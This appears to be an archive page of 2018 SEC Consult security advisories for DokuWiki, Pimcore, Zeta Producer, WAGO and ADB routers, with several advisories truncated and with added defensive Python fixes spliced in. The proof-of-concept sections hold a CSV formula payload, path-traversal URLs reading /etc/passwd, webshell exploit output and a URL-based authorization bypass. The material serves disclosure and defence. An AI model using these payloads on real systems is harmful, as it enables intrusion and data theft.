to be careful when opening files via the CSV export functionality.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) CSV Formula Injection vulnerability
The administration panel of the application has a "CSV export of users"
feature which allows the export of user data (username, real name,
email address and user groups) as a CSV file. On the registration page,
an attacker can set values in the Real Name field that, when exported and
opened with a spreadsheet application (Microsoft Excel, OpenOffice, etc.),
are interpreted as a formula. This puts administrators who open such
exported files at risk. Exfiltration of sensitive data or even the execution
of arbitrary code on the victim's local machine can be the result. The final
impact depends on the spreadsheet software used on the victim's client.


Proof of concept:
-
1) CSV Formula Injection vulnerability
Registration URL:
http://www.example.com/doku.php?id=start=register

When the registration request is submitted, the following parameters are sent
in a POST request:

sectok==register=1=login_parameter=evil_csv_formula_injection_payload=email_address

The "fullname" parameter is not sanitized before being stored and during
the CSV export. An attacker can inject different CSV formula
payloads in the fullname parameter.
For example:
=cmd|'/C calc'!A0

As soon as the file is opened in Microsoft Excel, the program calc.exe is
launched. Different warnings might pop up. However, these warnings are usually
ignored because the file appears to come from a trusted source.
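Since the vendor will not change the export, the mitigation belongs in whatever produces or consumes the CSV. The following Python code is an added example (not DokuWiki code and not from the advisory) of a user export that neutralises formula-triggering cells before writing them, together with a check that lists which stored records already carry such values. The user records are constructed; the third one uses the advisory's payload.

```python
import csv
import io

# Constructed user records; "mallory" carries the payload from the advisory
# and "trent" shows the cost of the rule: a phone number starting with '+'
# is neutralised as well.
USERS = [
    {"user": "alice", "name": "Alice Example", "email": "alice@example.invalid", "groups": "admin,user"},
    {"user": "bob", "name": "Bob O'Neil", "email": "bob@example.invalid", "groups": "user"},
    {"user": "mallory", "name": "=cmd|'/C calc'!A0", "email": "mallory@example.invalid", "groups": "user"},
    {"user": "trent", "name": "+1 555 0100", "email": "trent@example.invalid", "groups": "user"},
]
FIELDS = ["user", "name", "email", "groups"]

# Leading characters that make Excel/LibreOffice treat a cell as a formula,
# plus tab and carriage return, which some importers use as cell/row breaks.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Prefix a formula-looking value with a single quote so spreadsheets keep
    it as text.  Quoting of separators and double quotes is left to the csv
    module (QUOTE_ALL below)."""
    text = "" if value is None else str(value)
    return "'" + text if text.startswith(FORMULA_TRIGGERS) else text


def export_users_csv(users, neutralize=True):
    """Render users as CSV; neutralize=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, quoting=csv.QUOTE_ALL,
                            lineterminator="\r\n")
    writer.writeheader()
    for user in users:
        writer.writerow({k: neutralize_cell(user[k]) if neutralize else user[k]
                         for k in FIELDS})
    return buf.getvalue()


def dangerous_cells(users):
    """(user, field, value) for every stored value that would be a formula."""
    return [(u["user"], field, u[field]) for u in users for field in FIELDS
            if str(u[field]).startswith(FORMULA_TRIGGERS)]


if __name__ == "__main__":
    print(export_users_csv(USERS, neutralize=False))
    print(export_users_csv(USERS))
    print(dangerous_cells(USERS))
```

The single-quote prefix is visible in the opened sheet, which is the accepted trade-off: it is the only form that every common spreadsheet reads as literal text. Where the export cannot be changed, dangerous_cells() is the audit to run against the user table before anyone opens an exported file in a spreadsheet.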


Vulnerable / tested versions:
-
The latest version 2018-04-22a "Greebo" has been tested:
https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz

Also found to be vulnerable:
 2017-02-19 stable release
 2016-06-26 stable release
 2015-08-10 stable release
 2014-09-29 stable release
 2014-05-05 stable release
 2013-12-08 stable release


Vendor contact timeline:

2018-07-18: Contacting vendor through a...@splitbrain.org
2018-07-18: Vendor replied, they asked for the advisory without encryption
2018-07-19: Advisory sent without encryption
2018-07-19: Vendor replied with no intention to fix the vulnerability
2018-07-30: Reminder sent to the vendor. No reply
2018-08-20: Ask for updates to the vendor
2018-08-20: Vendor replied that no patch will be provided
2018-09-06: Public release of security advisory


Solution:
-
The issue will not be fixed according to the vendor:
https://github.com/splitbrain/dokuwiki/issues/2450


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive te

SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore

2018-08-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
===
  title: SQL Injection, XSS & CSRF vulnerabilities
product: Pimcore
 vulnerable version: 5.2.3 and below
  fixed version: 5.3.0
 CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
 impact: High
   homepage: https://pimcore.com/en
  found: 2018-06-11
 by: T. Silpavarangkura (Office Bangkok)
 N. Rai-Ngoen (Office Bangkok)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Pimcore is an award-winning consolidated open source enterprise platform for
master data management (PIM/MDM), user experience management (CMS/UX), digital
asset management (DAM) and eCommerce."

Source: https://pimcore.com/en


Business recommendation:

The vendor provides a patch for most identified issues, but XSS will not be
fixed according to the vendor.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected by further security issues.


Vulnerability overview/description:
---
1. SQL Injection (CVE-2018-14058)
Multiple SQL injection vulnerabilities have been identified in the REST web
service API. An attacker who obtains a valid API key that has been granted the
necessary permission could extract information from the database.

2. Stored Cross-site Scripting (CVE-2018-14059)
Multiple stored cross-site scripting vulnerabilities have been identified
across multiple functions in the application, which allows an authenticated
attacker to insert arbitrary JavaScript code in virtually all text fields and
data entries in the application.

3. Cross-site Request Forgery (CVE-2018-14057)
Multiple functions in the application are not protected by the existing
anti-CSRF token, which allows an attacker to perform a cross-site request
forgery attack to at least add, update or delete entries, among other actions.


Proof of concept:
-
1. SQL Injection (CVE-2018-14058)
The following URLs demonstrate the issue:
http:///webservice/rest/asset-count?apikey=[...]=
http:///webservice/rest/asset-inquire?apikey=[...]=
http:///webservice/rest/asset-list?apikey=[...]=
http:///webservice/rest/document-count?apikey=[...]=
http:///webservice/rest/document-inquire?apikey=[...]=
http:///webservice/rest/document-list?apikey=[...]=
http:///webservice/rest/object-count?apikey=[...]=
http:///webservice/rest/object-inquire?apikey=[...]=
http:///webservice/rest/object-list?apikey=[...]=

Note that a valid API key that is granted at least either "Assets", "Documents"
or "Objects" permission is required to perform an SQL injection attack against
associated API endpoints successfully.


2. Stored Cross-site Scripting (CVE-2018-14059)
Most of the text fields in pop-up dialogs and data entries in the application
are vulnerable to the cross-site scripting vulnerability, which can be
exploited by an authenticated attacker. For example, the attacker could insert
an attack payload while performing at least the following actions:

1) Edit a user account's first name/last name/e-mail address.
2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/
Quantity Value/Static Routes entry value in the table.
3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/
Field-Collections/Objectbrick/Classification Store item.


The vendor stated that many identified XSS issues only affect administrative
functions and hence the issues will not be fixed:
"They are only affecting administrative functionalities (higher privileges
required) - so this isn't used by non-trusted users - a check just adds
additional overhead without any benefits for security."

SEC Consult argued multiple times that XSS can still be exploited, e.g. when a
higher privileged user gets attacked, and that the issues should be fixed
nevertheless.


3. Cross-site Request Forgery (CVE-2018-14057)
The existing anti-CSRF token in the HTTP request header named
"X-pimcore-csrf-token" was found to be validated only in the "Settings >
Users / Roles" function. Therefore, an attacker could perform a cross-site
request forgery attack against virtually all other functions in order to
at least add, update and delete data without having to submit the anti-CSRF
token.

A non-exhaustive list of affected requests follows:
POST /admin/asset/add-asset
POST /admin/asset/add-asset-compatibility
GET /admin/asset/delete
GET /admin/asset/import-server
GET /admin
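A deny-by-default token check applied to every admin route, as an added example that is not Pimcore code. It assumes a request represented as a dict with method, path and headers, a session dict holding the token, and reuses the header name and the routes quoted above; the "state change over GET" rule reflects that a header token cannot protect a GET-triggered delete.

```python
import hmac
import secrets

SAFE_METHODS = frozenset({"GET", "HEAD", "OPTIONS"})
# Header name from the advisory; headers are compared case-insensitively.
TOKEN_HEADER = "x-pimcore-csrf-token"

# Routes the advisory lists as reachable over GET although they change state.
# A token cannot protect these; they have to be moved to POST.
STATE_CHANGING_GET_ROUTES = frozenset({
    "/admin/asset/delete",
    "/admin/asset/import-server",
})


def issue_token(session: dict) -> str:
    """Create the per-session token the client must echo back in the header."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_guard(request: dict, session: dict) -> tuple:
    """Check to run before any /admin handler, returning (allowed, reason).

    request: {"method": ..., "path": ..., "headers": {...}} (constructed shape).
    The point is that the check covers every admin route by default instead
    of being opted into by the one function that remembers to call it.
    """
    method = request["method"].upper()
    path = request["path"]
    if not path.startswith("/admin/"):
        return True, "not an admin route"
    if method in SAFE_METHODS:
        if path in STATE_CHANGING_GET_ROUTES:
            return False, "state change over GET; route must require POST"
        return True, "safe method"
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    presented = headers.get(TOKEN_HEADER)
    expected = session.get("csrf_token")
    if not expected or not presented:
        return False, "missing CSRF token"
    # Constant-time comparison; encode so non-ASCII input cannot raise TypeError.
    if not hmac.compare_digest(expected.encode(), presented.encode()):
        return False, "CSRF token mismatch"
    return True, "token valid"


if __name__ == "__main__":
    session = {}
    token = issue_token(session)
    for req in (
        {"method": "POST", "path": "/admin/asset/add-asset", "headers": {}},
        {"method": "POST", "path": "/admin/asset/add-asset",
         "headers": {"X-pimcore-csrf-token": token}},
        {"method": "GET", "path": "/admin/asset/delete", "headers": {}},
    ):
        print(req["method"], req["path"], "->", csrf_guard(req, session))
```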

SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS

2018-07-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
===
  title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
 vulnerable version: <=14.2.0
  fixed version: >=14.2.1
 CVE number: CVE-2018-13981, CVE-2018-13980
 impact: critical
   homepage: https://www.zeta-producer.com
  found: 2017-11-25
 by: P. Morimoto (Office Bangkok)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"With Zeta Producer, the website builder and online shop system for Windows,
you can create and manage your website locally, on your computer.
Get without expertise in 3 steps to your own homepage: select design,
paste content, publish website. Finished."

Source: https://www.zeta-producer.com/de/index.html


Business recommendation:

The vendor provides a patched version which should be installed immediately.

Users of the product also need to verify that the affected widgets are updated
in the corresponding website project! It could be necessary to rebuild the whole
project or copy the new widgets to the website projects. For further information
consult the vendor.

Furthermore, an in-depth security analysis is highly advised, as the software
may be affected by further security issues.


Vulnerability overview/description:
---
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server. If the user uploads a PHP script with a .php extension, the
server renames it to .phps to prevent PHP code execution.

However, the attacker can upload .php5 or .phtml to the server without any
restriction. These alternative file extensions can be executed as PHP code.

Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.

Unfortunately, if the server permits directory listing, the attacker can
easily browse to the uploaded PHP script. If directory listing is not
enabled, the attacker can still brute-force the random name to gain remote
code execution via the PHP script. Testing on a local server, it took about
20 seconds to brute-force the random name. This attack will be slower over
the Internet but is still feasible.

Users who run the Zeta Producer Desktop CMS GUI client locally are also
vulnerable, because the web server will be running on TCP port 9153.

The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php


2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
unauthenticated attacker can read local files by exploiting path traversal
issues.

The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php


Proof of concept:
-
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]

When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found :  
http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)


2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to
read arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!

http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc=list
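The two file-handling defects above, side by side with hardened variants, as an added example that is not Zeta Producer code. The allow-list of extensions and the base directory are assumptions; weak_upload_name reproduces only the rename behaviour the advisory describes.

```python
import os
import posixpath
import secrets

# --- Upload name handling (widget "formmailer") -----------------------------

def weak_upload_name(filename: str) -> str:
    """Deny-list behaviour as the advisory describes it: only ".php" is
    renamed to ".phps"; ".php5", ".phtml" and any other extension pass
    through unchanged. Kept here as the 'before' case."""
    base, ext = os.path.splitext(filename)
    return base + ".phps" if ext.lower() == ".php" else filename


# Assumed allow-list for contact-form attachments; adjust per deployment.
ALLOWED_EXTENSIONS = frozenset({".pdf", ".png", ".jpg", ".jpeg", ".txt"})


def upload_allowed(filename: str) -> bool:
    """Allow-list check on the final extension of the client's basename."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return ext in ALLOWED_EXTENSIONS


def safe_upload_name(filename: str) -> str:
    """Allow-list check plus a server-chosen storage name.

    The stored name comes from secrets.token_hex, which is unguessable,
    unlike uniqid(), whose timestamp-derived value the advisory brute-forced
    in about 20 seconds. Raises ValueError for anything not on the list.
    """
    if not upload_allowed(filename):
        raise ValueError(f"extension of {filename!r} is not allowed")
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext


# --- Path handling (widget "filebrowser") ------------------------------------

def safe_file_path(base_dir: str, user_path: str):
    """Resolve a client-supplied path inside base_dir, or return None.

    Uses posixpath for deterministic behaviour in this example; a real
    deployment should additionally compare os.path.realpath() results so
    symlinks cannot point outside base_dir.
    """
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for name in ("form.php", "form.php5", "report.pdf"):
        print(name, "->", weak_upload_name(name), "| allowed:", upload_allowed(name))
    print(safe_file_path("/srv/files", "../../../../../../../../../../etc/passwd"))
    print(safe_file_path("/srv/files", "docs/readme.txt"))
```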


Vulnerable / tested versions:
-
The following versions have been tested which were the latest version available
at the time of the test:

Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0

Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/


Vendor contact timeline:

2017-11-29: Contacting vendor through i...@zeta-producer.com and various other
email addresses from the website. No reply.
2017-12-13: 

SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T

2018-07-11 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
===
  title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
 vulnerable version: FW 01 - 01.01.10(01)
  fixed version: FW 02
 CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
 impact: High
   homepage: https://www.wago.com/
  found: 2018-04-25
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/

"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
7300T Web Panels help you reinforce the quality of your machinery and equipment
with a refined design and industry-leading software. Learn more about how the
right Web Panels make a difference.

HMI components are the finishing touch for machines or systems and they have an
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
HMIs that leave a lasting impression and significantly increase both the value
and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."

Source:
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp


Business recommendation:

HMI displays are widely used in SCADA infrastructures. The link between
their administrative (or informational) web interfaces and the users which
access these interfaces is critical. The presented attacks demonstrate how
simple it is to inject malicious code in order to break the security of this
link by exploiting minimal user interaction.

As a consequence a computer which is used for HMI administration should not
provide any possibility to get compromised via malicious script code.

Possible measures include:
   * Don't allow email clients
   * Don't provide Internet access at all on the HMI stations

SEC Consult recommends to immediately apply the available patches from the vendor.
A thorough security review should be performed by security professionals to
identify further potential security issues.


Vulnerability overview/description:
---
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross-site scripting vulnerabilities were identified within multiple
PHP scripts in the admin interface. The JSON input parameter which is sent to
the device is not sanitized sufficiently. An attacker can exploit this
vulnerability to execute arbitrary scripts in the context of the attacked user
and gain control over the active session.

This vulnerability is present for authenticated and unauthenticated users!


2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the
"PLC List" which can be configured in the web interface of the e!Display. By
storing a payload there, an administrative or guest user can be attacked
without tricking them into visiting a malicious web site or clicking on a
malicious link.

This vulnerability is only present for authenticated users!


3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even
possible to change the location of the uploaded file on the system. As the
web service does not run as a privileged user, it is not possible to upload a
file directly to the web root, but it is to many other locations on the file system.
The normal user 'user' and the administrative user 'admin' can both upload
files to the system.


4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions a file in the web root can be overwritten
by the unprivileged 'www' user. This is the same user which is used in the
context of the web server.


5) Remote code execution via

SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
  title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13110
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-07-11
 by: Stefan Viehböck (Office Vienna)
 Johannes Greil (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the group manipulation vulnerability on affected and unpatched
devices an attacker is able to gain access to the command line interface (CLI)
if previously disabled by the ISP.

Depending on the feature-set of the CLI (ISP dependent) it is then possible to
gain access to the whole configuration and manipulate settings in the web GUI
and escalate privileges to highest access rights.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to
gain access to the CLI (if it has been previously disabled by the configuration)
and escalate his privileges.

Depending on the CLI features it is possible to extract the whole configuration
and manipulate settings or gain access to debug features of the device, e.g.
via "debug", "upgrade", "upload" etc. commands in the CLI.

Attackers can gain access to sensitive configuration data such as VoIP
credentials or other information and manipulate any settings of the device.


Proof of concept:
-
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and
overwrite the local linux groups called "remoteaccess" or "localaccess"
(in /etc/group) which define access to Telnet or SSH on the ADB devices.

It may be possible to overwrite the "root" group as well but it may brick the
device and the default user is already within the "root" group. Hence this
attack has not been further tested.

The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
 http://$IP/ui/dboard/storage/storageusers?backto=storage

   This will generate the following new group in /etc/group. The original
   "localaccess" group will be overwritten.

   localaccess:Storage Group:5001:

b) Then delete this group via the web GUI again; the entry will be removed
   from /etc/group completely.

c) Afterwards, create the following new group name entry via the web GUI and
   add your user account (e.g. admin) wh
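Validating a storage-group name before it is written to /etc/group, as an added example that is not ADB firmware code. The /etc/group excerpt, the reserved-group set and the name charset are constructed assumptions; the group names "root", "localaccess" and "remoteaccess" come from the advisory.

```python
import re

# Groups the advisory names as controlling Telnet/SSH access, plus root;
# a user-created storage group must never shadow or replace one of these.
RESERVED_GROUPS = frozenset({"root", "remoteaccess", "localaccess"})

# Constructed /etc/group excerpt (name:password:gid:members).
SAMPLE_ETC_GROUP = """\
root:x:0:
localaccess:x:100:admin
remoteaccess:x:101:
storage:x:5000:
"""

# Conservative charset: lowercase, digits, '_' and '-', no spaces.
NAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def existing_groups(etc_group_text: str) -> set:
    """Group names present in an /etc/group style file."""
    names = set()
    for line in etc_group_text.splitlines():
        if line and not line.startswith("#"):
            names.add(line.split(":", 1)[0])
    return names


def validate_storage_group(name: str, etc_group_text: str) -> tuple:
    """Return (ok, reason) for a storage-group name submitted via the web GUI.

    Rejects names outside the charset, reserved system groups and names that
    collide with an existing group, so the GUI can never create an entry that
    overwrites, or on deletion removes, a system access group.
    """
    if not NAME_RE.match(name):
        return False, "invalid characters or length"
    if name in RESERVED_GROUPS:
        return False, "reserved system group"
    if name in existing_groups(etc_group_text):
        return False, "collides with an existing group"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("localaccess", "storage", "Storage Group", "familyshare"):
        print(candidate, "->", validate_storage_group(candidate, SAMPLE_ETC_GROUP))
```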

SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
  title: Authorization Bypass
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13109
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-28
 by: Johannes Greil (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.

An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI; further subsequent layers/paths (sub menus) could not be accessed during
testing, but further exploitation can't be ruled out entirely.


Proof of concept:
-
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver

Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver

This works for many other settings within the web GUI!


In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp

Nevertheless, it can't be ruled out that sub menus can be accessed too once
deeper tests are performed.
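Canonicalizing the request path before the ACL lookup, as an added example that is not ADB firmware code. The forbidden-entry list is a constructed stand-in for an ISP restriction set and uses the paths quoted above; naive_is_allowed models the exact-string behaviour the bypass relies on.

```python
import posixpath
from urllib.parse import unquote

# Constructed restriction set: web GUI entries a standard user must not reach.
FORBIDDEN_ENTRIES = frozenset({
    "/ui/dboard/settings/management/telnetserver",
    "/ui/dboard/settings/proxy",
})


def naive_is_allowed(path: str) -> bool:
    """Exact-string lookup, the behaviour the advisory describes: a second
    slash yields a string that is not in the list, so the check passes."""
    return path not in FORBIDDEN_ENTRIES


def canonical_path(path: str) -> str:
    """Reduce a request path to one canonical form before any ACL lookup:
    percent-decode, collapse repeated slashes, resolve '.' and '..' and
    drop a trailing slash."""
    path = unquote(path)
    path = "/" + path.lstrip("/")      # normpath would keep a leading "//"
    path = posixpath.normpath(path)    # collapses "//" and "/./", resolves ".."
    return path if path == "/" else path.rstrip("/")


def hardened_is_allowed(path: str) -> bool:
    """Deny when the canonical path is a forbidden entry or lies beneath one,
    so blocking "/ui/dboard/settings/proxy" also covers its "rtsp" sub menu."""
    c = canonical_path(path)
    return not any(c == f or c.startswith(f + "/") for f in FORBIDDEN_ENTRIES)


if __name__ == "__main__":
    for p in ("/ui/dboard/settings/management/telnetserver",
              "/ui/dboard/settings/management//telnetserver",
              "/ui/dboard/settings/proxy//rtsp"):
        print(p, "naive:", naive_is_allowed(p), "hardened:", hardened_is_allowed(p))
```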


Vulnerable / tested versions:
-
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV4202N - E_

SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
  title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13108
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-09
 by: Johannes Greil (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
